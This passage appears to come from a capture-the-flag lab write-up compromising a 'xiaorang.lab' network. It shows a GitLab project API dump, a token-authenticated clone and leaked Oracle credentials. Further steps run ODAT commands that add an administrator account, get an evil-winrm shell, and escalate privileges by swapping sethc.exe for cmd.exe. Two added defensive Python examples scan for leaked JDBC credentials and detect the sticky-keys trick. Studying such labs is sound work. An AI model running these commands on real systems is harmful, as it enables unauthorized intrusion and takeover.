"ci_allow_fork_pipelines_to_run_in_parent_project": true,
"public_jobs": true,
"build_timeout": 3600,
"auto_cancel_pending_pipelines": "enabled",
"ci_config_path": null,
"shared_with_groups": [],
"only_allow_merge_if_pipeline_succeeds": false,
"allow_merge_on_skipped_pipeline": null,
"restrict_user_defined_variables": false,
"request_access_enabled": true,
"only_allow_merge_if_all_discussions_are_resolved": false,
"remove_source_branch_after_merge": true,
"printing_merge_request_link_enabled": true,
"merge_method": "merge",
"squash_option": "default_off",
"enforce_auth_checks_on_uploads": true,
"suggestion_commit_message": null,
"merge_commit_template": null,
"squash_commit_template": null,
"issue_branch_template": null,
"auto_devops_enabled": true,
"auto_devops_deploy_strategy": "continuous",
"autoclose_referenced_issues": true,
"keep_latest_artifact": true,
"runner_token_expiration_interval": null,
"permissions": {
"project_access": null,
"group_access": {
"access_level": 50,
"notification_level": 3
}
}
},
{
"id": 4,
"description": null,
"name": "XRAdmin",
"name_with_namespace": "XRLAB / XRAdmin",
"path": "xradmin",
"path_with_namespace": "xrlab/xradmin",
"created_at": "2022-12-25T07:48:16.751Z",
"default_branch": "main",
"tag_list": [],
"topics": [],
"ssh_url_to_repo": "git@gitlab.xiaorang.lab:xrlab/xradmin.git",
"http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/xradmin.git",
"web_url": "http://gitlab.xiaorang.lab/xrlab/xradmin",
"readme_url": "http://gitlab.xiaorang.lab/xrlab/xradmin/-/blob/main/README.md",
"avatar_url": null,
"forks_count": 0,
"star_count": 0,
"last_activity_at": "2023-05-30T10:27:31.762Z",
"namespace": {
"id": 8,
"name": "XRLAB",
"path": "xrlab",
"kind": "group",
"full_path": "xrlab",
"parent_id": null,
"avatar_url": null,
"web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
},
"_links": {
"self": "http://gitlab.xiaorang.lab/api/v4/projects/4",
"issues": "http://gitlab.xiaorang.lab/api/v4/projects/4/issues",
"merge_requests": "http://gitlab.xiaorang.lab/api/v4/projects/4/merge_requests",
"repo_branches": "http://gitlab.xiaorang.lab/api/v4/projects/4/repository/branches",
"labels": "http://gitlab.xiaorang.lab/api/v4/projects/4/labels",
"events": "http://gitlab.xiaorang.lab/api/v4/projects/4/events",
"members": "http://gitlab.xiaorang.lab/api/v4/projects/4/members",
"cluster_agents": "http://gitlab.xiaorang.lab/api/v4/projects/4/cluster_agents"
},
"packages_enabled": true,
"empty_repo": false,
"archived": false,
"visibility": "private",
"resolve_outdated_diff_discussions": false,
"container_expiration_policy": {
"cadence": "1d",
"enabled": false,
"keep_n": 10,
"older_than": "90d",
"name_regex": ".*",
"name_regex_keep": null,
"next_run_at": "2022-12-26T07:48:16.788Z"
},
"issues_enabled": true,
"merge_requests_enabled": true,
"wiki_enabled": true,
"jobs_enabled": true,
"snippets_enabled": true,
"container_registry_enabled": true,
"service_desk_enabled": false,
"service_desk_address": null,
"can_create_merge_request_in": true,
"issues_access_level": "enabled",
"repository_access_level": "enabled",
"merge_requests_access_level": "enabled",
"forking_access_level": "enabled",
"wiki_access_level": "enabled",
"builds_access_level": "enabled",
"snippets_access_level": "enabled",
"pages_access_level": "private",
"operations_access_level": "enabled",
"analytics_access_level": "enabled",
"container_registry_access_level": "enabled",
"security_and_compliance_access_level": "private",
"releases_access_level": "enabled",
"environments_access_level": "enabled",
"feature_flags_access_level": "enabled",
"infrastructure_access_level": "enabled",
"monitor_access_level": "enabled",
"emails_disabled": null,
"shared_runners_enabled": true,
"lfs_enabled": true,
"creator_id": 2,
"import_url": null,
"import_type": null,
"import_status": "none",
"open_issues_count": 0,
"ci_default_git_depth": 20,
"ci_forward_deployment_enabled": true,
"ci_job_token_scope_enabled": false,
"ci_separated_caches": true,
"ci_opt_in_jwt": false,
"ci_allow_fork_pipelines_to_run_in_parent_project": true,
"public_jobs": true,
"build_timeout": 3600,
"auto_cancel_pending_pipelines": "enabled",
"ci_config_path": null,
"shared_with_groups": [],
"only_allow_merge_if_pipeline_succeeds": false,
"allow_merge_on_skipped_pipeline": null,
"restrict_user_defined_variables": false,
"request_access_enabled": true,
"only_allow_merge_if_all_discussions_are_resolved": false,
"remove_source_branch_after_merge": true,
"printing_merge_request_link_enabled": true,
"merge_method": "merge",
"squash_option": "default_off",
"enforce_auth_checks_on_uploads": true,
"suggestion_commit_message": null,
"merge_commit_template": null,
"squash_commit_template": null,
"issue_branch_template": null,
"auto_devops_enabled": false,
"auto_devops_deploy_strategy": "continuous",
"autoclose_referenced_issues": true,
"keep_latest_artifact": true,
"runner_token_expiration_interval": null,
"permissions": {
"project_access": null,
"group_access": {
"access_level": 50,
"notification_level": 3
}
}
},
{
"id": 3,
"description": null,
"name": "Awenode",
"name_with_namespace": "XRLAB / Awenode",
"path": "awenode",
"path_with_namespace": "xrlab/awenode",
"created_at": "2022-12-25T07:46:43.635Z",
"default_branch": "master",
"tag_list": [],
"topics": [],
"ssh_url_to_repo": "git@gitlab.xiaorang.lab:xrlab/awenode.git",
"http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/awenode.git",
"web_url": "http://gitlab.xiaorang.lab/xrlab/awenode",
"readme_url": "http://gitlab.xiaorang.lab/xrlab/awenode/-/blob/master/README.md",
"avatar_url": null,
"forks_count": 0,
"star_count": 0,
"last_activity_at": "2022-12-25T07:46:43.635Z",
"namespace": {
"id": 8,
"name": "XRLAB",
"path": "xrlab",
"kind": "group",
"full_path": "xrlab",
"parent_id": null,
"avatar_url": null,
"web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
},
"_links": {
"self": "http://gitlab.xiaorang.lab/api/v4/projects/3",
"issues": "http://gitlab.xiaorang.lab/api/v4/projects/3/issues",
"merge_requests": "http://gitlab.xiaorang.lab/api/v4/projects/3/merge_requests",
"repo_branches": "http://gitlab.xiaorang.lab/api/v4/projects/3/repository/branches",
"labels": "http://gitlab.xiaorang.lab/api/v4/projects/3/labels",
"events": "http://gitlab.xiaorang.lab/api/v4/projects/3/events",
"members": "http://gitlab.xiaorang.lab/api/v4/projects/3/members",
"cluster_agents": "http://gitlab.xiaorang.lab/api/v4/projects/3/cluster_agents"
},
"packages_enabled": true,
"empty_repo": false,
"archived": false,
"visibility": "private",
"resolve_outdated_diff_discussions": false,
"container_expiration_policy": {
"cadence": "1d",
"enabled": false,
"keep_n": 10,
"older_than": "90d",
"name_regex": ".*",
"name_regex_keep": null,
"next_run_at": "2022-12-26T07:46:44.614Z"
},
"issues_enabled": true,
"merge_requests_enabled": true,
"wiki_enabled": true,
"jobs_enabled": true,
"snippets_enabled": true,
"container_registry_enabled": true,
"service_desk_enabled": false,
"service_desk_address": null,
"can_create_merge_request_in": true,
"issues_access_level": "enabled",
"repository_access_level": "enabled",
"merge_requests_access_level": "enabled",
"forking_access_level": "enabled",
"wiki_access_level": "enabled",
"builds_access_level": "enabled",
"snippets_access_level": "enabled",
"pages_access_level": "private",
"operations_access_level": "enabled",
"analytics_access_level": "enabled",
"container_registry_access_level": "enabled",
"security_and_compliance_access_level": "private",
"releases_access_level": "enabled",
"environments_access_level": "enabled",
"feature_flags_access_level": "enabled",
"infrastructure_access_level": "enabled",
"monitor_access_level": "enabled",
"emails_disabled": null,
"shared_runners_enabled": true,
"lfs_enabled": true,
"creator_id": 2,
"import_url": null,
"import_type": "gitlab_project",
"import_status": "finished",
"open_issues_count": 0,
"ci_default_git_depth": 20,
"ci_forward_deployment_enabled": true,
"ci_job_token_scope_enabled": false,
"ci_separated_caches": true,
"ci_opt_in_jwt": false,
"ci_allow_fork_pipelines_to_run_in_parent_project": true,
"public_jobs": true,
"build_timeout": 3600,
"auto_cancel_pending_pipelines": "enabled",
"ci_config_path": null,
"shared_with_groups": [],
"only_allow_merge_if_pipeline_succeeds": false,
"allow_merge_on_skipped_pipeline": null,
"restrict_user_defined_variables": false,
"request_access_enabled": true,
"only_allow_merge_if_all_discussions_are_resolved": false,
"remove_source_branch_after_merge": true,
"printing_merge_request_link_enabled": true,
"merge_method": "merge",
"squash_option": "default_off",
"enforce_auth_checks_on_uploads": true,
"suggestion_commit_message": null,
"merge_commit_template": null,
"squash_commit_template": null,
"issue_branch_template": null,
"auto_devops_enabled": true,
"auto_devops_deploy_strategy": "continuous",
"autoclose_referenced_issues": true,
"keep_latest_artifact": true,
"runner_token_expiration_interval": null,
"permissions": {
"project_access": {
"access_level": 40,
"notification_level": null
},
"group_access": {
"access_level": 50,
"notification_level": 3
}
}
},
{
"id": 2,
"description": "Example GitBook site using GitLab Pages: https://pages.gitlab.io/gitbook",
"name": "XRWiki",
"name_with_namespace": "XRLAB / XRWiki",
"path": "xrwiki",
"path_with_namespace": "xrlab/xrwiki",
"created_at": "2022-12-25T07:44:18.589Z",
"default_branch": "master",
"tag_list": [],
"topics": [],
"ssh_url_to_repo": "git@gitlab.xiaorang.lab:xrlab/xrwiki.git",
"http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/xrwiki.git",
"web_url": "http://gitlab.xiaorang.lab/xrlab/xrwiki",
"readme_url": "http://gitlab.xiaorang.lab/xrlab/xrwiki/-/blob/master/README.md",
"avatar_url": "http://gitlab.xiaorang.lab/uploads/-/system/project/avatar/2/gitbook.png",
"forks_count": 0,
"star_count": 0,
"last_activity_at": "2022-12-25T07:44:18.589Z",
"namespace": {
"id": 8,
"name": "XRLAB",
"path": "xrlab",
"kind": "group",
"full_path": "xrlab",
"parent_id": null,
"avatar_url": null,
"web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
},
"_links": {
"self": "http://gitlab.xiaorang.lab/api/v4/projects/2",
"issues": "http://gitlab.xiaorang.lab/api/v4/projects/2/issues",
"merge_requests": "http://gitlab.xiaorang.lab/api/v4/projects/2/merge_requests",
"repo_branches": "http://gitlab.xiaorang.lab/api/v4/projects/2/repository/branches",
"labels": "http://gitlab.xiaorang.lab/api/v4/projects/2/labels",
"events": "http://gitlab.xiaorang.lab/api/v4/projects/2/events",
"members": "http://gitlab.xiaorang.lab/api/v4/projects/2/members",
"cluster_agents": "http://gitlab.xiaorang.lab/api/v4/projects/2/cluster_agents"
},
"packages_enabled": true,
"empty_repo": false,
"archived": false,
"visibility": "private",
"resolve_outdated_diff_discussions": null,
"container_expiration_policy": {
"cadence": "1d",
"enabled": false,
"keep_n": 10,
"older_than": "90d",
"name_regex": ".*",
"name_regex_keep": null,
"next_run_at": "2022-12-26T07:44:18.627Z"
},
"issues_enabled": true,
"merge_requests_enabled": true,
"wiki_enabled": false,
"jobs_enabled": true,
"snippets_enabled": false,
"container_registry_enabled": false,
"service_desk_enabled": false,
"service_desk_address": null,
"can_create_merge_request_in": true,
"issues_access_level": "enabled",
"repository_access_level": "enabled",
"merge_requests_access_level": "enabled",
"forking_access_level": "enabled",
"wiki_access_level": "disabled",
"builds_access_level": "enabled",
"snippets_access_level": "disabled",
"pages_access_level": "public",
"operations_access_level": "enabled",
"analytics_access_level": "enabled",
"container_registry_access_level": "disabled",
"security_and_compliance_access_level": "private",
"releases_access_level": "enabled",
"environments_access_level": "enabled",
"feature_flags_access_level": "enabled",
"infrastructure_access_level": "enabled",
"monitor_access_level": "enabled",
"emails_disabled": null,
"shared_runners_enabled": true,
"lfs_enabled": true,
"creator_id": 2,
"import_url": null,
"import_type": "gitlab_project",
"import_status": "finished",
"open_issues_count": 0,
"ci_default_git_depth": 20,
"ci_forward_deployment_enabled": true,
"ci_job_token_scope_enabled": false,
"ci_separated_caches": true,
"ci_opt_in_jwt": false,
"ci_allow_fork_pipelines_to_run_in_parent_project": true,
"public_jobs": true,
"build_timeout": 3600,
"auto_cancel_pending_pipelines": "enabled",
"ci_config_path": null,
"shared_with_groups": [],
"only_allow_merge_if_pipeline_succeeds": false,
"allow_merge_on_skipped_pipeline": null,
"restrict_user_defined_variables": false,
"request_access_enabled": false,
"only_allow_merge_if_all_discussions_are_resolved": false,
"remove_source_branch_after_merge": true,
"printing_merge_request_link_enabled": true,
"merge_method": "merge",
"squash_option": "default_off",
"enforce_auth_checks_on_uploads": true,
"suggestion_commit_message": null,
"merge_commit_template": null,
"squash_commit_template": null,
"issue_branch_template": null,
"auto_devops_enabled": true,
"auto_devops_deploy_strategy": "continuous",
"autoclose_referenced_issues": true,
"keep_latest_artifact": true,
"runner_token_expiration_interval": null,
"permissions": {
"project_access": {
"access_level": 40,
"notification_level": null
},
"group_access": {
"access_level": 50,
"notification_level": 3
}
}
},
{
"id": 1,
"description": "This project is automatically generated and helps monitor this GitLab instance. [Learn more](/help/administration/monitoring/gitlab_self_monitoring_project/index).",
"name": "Monitoring",
"name_with_namespace": "GitLab Instance / Monitoring",
"path": "Monitoring",
"path_with_namespace": "gitlab-instance-23352f48/Monitoring",
"created_at": "2022-12-25T07:18:20.914Z",
"default_branch": "main",
"tag_list": [],
"topics": [],
"ssh_url_to_repo": "git@gitlab.xiaorang.lab:gitlab-instance-23352f48/Monitoring.git",
"http_url_to_repo": "http://gitlab.xiaorang.lab/gitlab-instance-23352f48/Monitoring.git",
"web_url": "http://gitlab.xiaorang.lab/gitlab-instance-23352f48/Monitoring",
"readme_url": null,
"avatar_url": null,
"forks_count": 0,
"star_count": 0,
"last_activity_at": "2022-12-25T07:18:20.914Z",
"namespace": {
"id": 2,
"name": "GitLab Instance",
"path": "gitlab-instance-23352f48",
"kind": "group",
"full_path": "gitlab-instance-23352f48",
"parent_id": null,
"avatar_url": null,
"web_url": "http://gitlab.xiaorang.lab/groups/gitlab-instance-23352f48"
},
"_links": {
"self": "http://gitlab.xiaorang.lab/api/v4/projects/1",
"issues": "http://gitlab.xiaorang.lab/api/v4/projects/1/issues",
"merge_requests": "http://gitlab.xiaorang.lab/api/v4/projects/1/merge_requests",
"repo_branches": "http://gitlab.xiaorang.lab/api/v4/projects/1/repository/branches",
"labels": "http://gitlab.xiaorang.lab/api/v4/projects/1/labels",
"events": "http://gitlab.xiaorang.lab/api/v4/projects/1/events",
"members": "http://gitlab.xiaorang.lab/api/v4/projects/1/members",
"cluster_agents": "http://gitlab.xiaorang.lab/api/v4/projects/1/cluster_agents"
},
"packages_enabled": true,
"empty_repo": true,
"archived": false,
"visibility": "internal",
"resolve_outdated_diff_discussions": false,
"container_expiration_policy": {
"cadence": "1d",
"enabled": false,
"keep_n": 10,
"older_than": "90d",
"name_regex": ".*",
"name_regex_keep": null,
"next_run_at": "2022-12-26T07:18:21.108Z"
},
"issues_enabled": true,
"merge_requests_enabled": true,
"wiki_enabled": true,
"jobs_enabled": true,
"snippets_enabled": true,
"container_registry_enabled": true,
"service_desk_enabled": false,
"can_create_merge_request_in": true,
"issues_access_level": "enabled",
"repository_access_level": "enabled",
"merge_requests_access_level": "enabled",
"forking_access_level": "enabled",
"wiki_access_level": "enabled",
"builds_access_level": "enabled",
"snippets_access_level": "enabled",
"pages_access_level": "private",
"operations_access_level": "enabled",
"analytics_access_level": "enabled",
"container_registry_access_level": "enabled",
"security_and_compliance_access_level": "private",
"releases_access_level": "enabled",
"environments_access_level": "enabled",
"feature_flags_access_level": "enabled",
"infrastructure_access_level": "enabled",
"monitor_access_level": "enabled",
"emails_disabled": null,
"shared_runners_enabled": true,
"lfs_enabled": true,
"creator_id": 1,
"import_status": "none",
"open_issues_count": 0,
"ci_default_git_depth": 20,
"ci_forward_deployment_enabled": true,
"ci_job_token_scope_enabled": false,
"ci_separated_caches": true,
"ci_opt_in_jwt": false,
"ci_allow_fork_pipelines_to_run_in_parent_project": true,
"public_jobs": true,
"build_timeout": 3600,
"auto_cancel_pending_pipelines": "enabled",
"ci_config_path": null,
"shared_with_groups": [],
"only_allow_merge_if_pipeline_succeeds": false,
"allow_merge_on_skipped_pipeline": null,
"restrict_user_defined_variables": false,
"request_access_enabled": true,
"only_allow_merge_if_all_discussions_are_resolved": false,
"remove_source_branch_after_merge": true,
"printing_merge_request_link_enabled": true,
"merge_method": "merge",
"squash_option": "default_off",
"enforce_auth_checks_on_uploads": true,
"suggestion_commit_message": null,
"merge_commit_template": null,
"squash_commit_template": null,
"issue_branch_template": null,
"auto_devops_enabled": true,
"auto_devops_deploy_strategy": "continuous",
"autoclose_referenced_issues": true,
"keep_latest_artifact": true,
"runner_token_expiration_interval": null,
"permissions": {
"project_access": null,
"group_access": null
}
}
]
There are 6 projects in total:
- gitlab.xiaorang.lab:gitlab-instance-23352f48/Monitoring.git
- gitlab.xiaorang.lab:xrlab/xrwiki.git
- gitlab.xiaorang.lab:xrlab/awenode.git
- gitlab.xiaorang.lab:xrlab/xradmin.git
- gitlab.xiaorang.lab:xrlab/internal-secret.git
Clone the repositories with git clone through proxychains:
# username:password@url/namespace/project
proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/xradmin.git
After downloading the source, search it directly for the Oracle IP:
url: jdbc:oracle:thin:@172.22.14.31:1521/orcl
username: xradmin
password: fcMyE8t9E4XdsKf
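The leak above is a plaintext JDBC URL with the username and password sitting next to it in a checked-in config file. The following added example (not part of the original writeup) is a small repository scanner that flags Oracle JDBC thin URLs and rates them higher when literal credentials are within a few lines; the sample files and their values are constructed, and `${VAR}` references are treated as environment lookups rather than leaks.

```python
import re
from dataclasses import dataclass

# An Oracle JDBC thin URL: host, port and SID/service name.
JDBC_RE = re.compile(r"jdbc:oracle:thin:@(?P<host>[\w.\-]+):(?P<port>\d+)[/:](?P<sid>\w+)")
# username/password keys in YAML or .properties style, matched line by line.
CRED_RE = re.compile(r"^\s*(?P<key>username|password)\s*[:=]\s*['\"]?(?P<val>[^'\"\s]+)", re.I | re.M)

@dataclass
class Finding:
    path: str
    line: int              # 1-based line of the JDBC URL
    host: str
    port: int
    sid: str
    plaintext_keys: tuple  # credential keys with literal values near the URL
    severity: str          # "high" when both username and password are literal

def scan_text(path: str, text: str, window: int = 5) -> list:
    """Flag each Oracle JDBC URL in `text` and any literal credentials near it."""
    lines = text.splitlines()
    out = []
    for i, line in enumerate(lines):
        m = JDBC_RE.search(line)
        if not m:
            continue
        nearby = "\n".join(lines[max(0, i - window): i + window + 1])
        literal = sorted({k.lower() for k, v in CRED_RE.findall(nearby)
                          if not v.startswith("${")})  # ${VAR} is an env reference, not a leak
        sev = "high" if {"username", "password"} <= set(literal) else "medium"
        out.append(Finding(path, i + 1, m["host"], int(m["port"]), m["sid"], tuple(literal), sev))
    return out

def scan_repo(files: dict) -> list:
    """`files` maps a relative path to its text (e.g. read from a git checkout)."""
    return [f for p, t in files.items() for f in scan_text(p, t)]

# Constructed sample files modelled on the leaked config; hosts and values are made up.
SAMPLE_FILES = {
    "src/main/resources/application.yml": (
        "spring:\n  datasource:\n"
        "    url: jdbc:oracle:thin:@10.0.0.5:1521/orcl\n"
        "    username: app_user\n    password: Example-Pass-123\n"),
    "config/db.properties": (
        "url=jdbc:oracle:thin:@db.example.internal:1521:ORCL\n"
        "username=${DB_USER}\npassword=${DB_PASS}\n"),
    "README.md": "Connect with jdbc:oracle:thin:@${DB_HOST}:1521/orcl via env vars.\n",
}

if __name__ == "__main__":
    for f in scan_repo(SAMPLE_FILES):
        print(f"[{f.severity}] {f.path}:{f.line} {f.host}:{f.port}/{f.sid} literal={f.plaintext_keys}")
```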
Use ODAT to execute shell commands:
proxychains odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net user chy 123!@#qwe /add'
proxychains odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net localgroup administrators chy /add'
Log in via RDP and get flag02.
Go back to the internal-secret project from earlier.
After downloading it, it turns out to be a password table; the corresponding machine is 172.22.14.46 XIAORANG\XR-0923.
Use the credentials zhangshuai:wSbEajHzZs
Log in via RDP.
There is no permission to access the Administrator folder, so privilege escalation is needed.
Check the current privileges:
whoami
whoami /priv
Attack with the tool [evil-winrm](https://github.com/Hackplayers/evil-winrm).
The account belongs to the Remote Desktop Users and Remote Management Users groups, so evil-winrm can be used to get a shell:
proxychains evil-winrm -i 172.22.14.46 -u zhangshuai -p wSbEajHzZs
Checking privileges again, the session now holds SeRestorePrivilege.
Because SeRestorePrivilege is held, files can be modified or the registry edited regardless of ACLs.
Rename cmd.exe to sethc.exe, then press Shift five times at the lock screen to launch sethc and escalate privileges.
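From the defender's side, the two signals in this step are a logon that carries SeRestorePrivilege (Security event 4672, "Special privileges assigned to new logon") and a write to an accessibility binary under System32 by something other than Windows servicing (Sysmon event 11, FileCreate). The following added example (not from the original writeup) runs that detection logic over constructed, normalised event records; the dict schema, the process names and the user names in the sample are assumptions for the example.

```python
import re

# Accessibility helpers launched as SYSTEM from the logon screen; a replaced
# binary here is the "sticky keys" trick used in this step.
ACCESSIBILITY_BINARIES = {"sethc.exe", "utilman.exe", "osk.exe", "narrator.exe", "magnify.exe"}
# Writers expected to touch System32 binaries during servicing.
TRUSTED_WRITERS = {"tiworker.exe", "trustedinstaller.exe"}
SENSITIVE_PRIVS = {"SeRestorePrivilege", "SeBackupPrivilege", "SeTakeOwnershipPrivilege"}

def check_event(ev: dict) -> list:
    """Return alert strings for one normalised Windows event (constructed schema)."""
    alerts = []
    if ev.get("source") == "Sysmon" and ev.get("event_id") == 11:   # FileCreate / overwrite
        target = ev.get("TargetFilename", "")
        name = target.rsplit("\\", 1)[-1].lower()
        writer = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
        if "\\system32\\" in target.lower() and name in ACCESSIBILITY_BINARIES and writer not in TRUSTED_WRITERS:
            alerts.append(f"accessibility binary written: {target} by {writer} ({ev.get('User')})")
    if ev.get("source") == "Security" and ev.get("event_id") == 4672:  # special privileges at logon
        privs = set(re.split(r"[\s,]+", ev.get("PrivilegeList", "").strip()))  # tab/newline separated
        hit = sorted(privs & SENSITIVE_PRIVS)
        if hit and not ev.get("SubjectUserName", "").endswith("$"):   # skip machine accounts
            alerts.append(f"{ev['SubjectUserName']} logged on with {', '.join(hit)}")
    return alerts

def scan(events: list) -> list:
    return [a for ev in events for a in check_event(ev)]

# Constructed sample telemetry (not captured from the lab): a WinRM session holding
# SeRestorePrivilege overwrites sethc.exe, surrounded by benign noise.
SAMPLE_EVENTS = [
    {"source": "Security", "event_id": 4672, "SubjectUserName": "zhangshuai",
     "PrivilegeList": "SeChangeNotifyPrivilege\n\t\t\tSeRestorePrivilege"},
    {"source": "Security", "event_id": 4672, "SubjectUserName": "XR-0923$",
     "PrivilegeList": "SeBackupPrivilege SeRestorePrivilege"},
    {"source": "Sysmon", "event_id": 11, "Image": "C:\\Windows\\System32\\wsmprovhost.exe",
     "User": "XIAORANG\\zhangshuai", "TargetFilename": "C:\\Windows\\System32\\sethc.exe"},
    {"source": "Sysmon", "event_id": 11, "Image": "C:\\Windows\\servicing\\TrustedInstaller.exe",
     "User": "NT AUTHORITY\\SYSTEM", "TargetFilename": "C:\\Windows\\System32\\sethc.exe"},
    {"source": "Sysmon", "event_id": 11, "Image": "C:\\Windows\\System32\\cmd.exe",
     "User": "XIAORANG\\zhangshuai", "TargetFilename": "C:\\Users\\zhangshuai\\notes.txt"},
]

if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print("ALERT:", a)
```

Event 4672 fires for every administrative logon, so in production the privilege check is baselined per account; here it is the fact that a standard user holds SeRestorePrivilege at all that matters.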
Flag
flag01: flag{6b648281-2dbb-4c20-bdbb-dff05fbd95fd}
flag02: flag{b61abb8b-08c3-45b4-a9ba-e39f1e90a87e}
flag03: flag{515d2cee-ff20-44ea-b28a-b3981f36b2cb}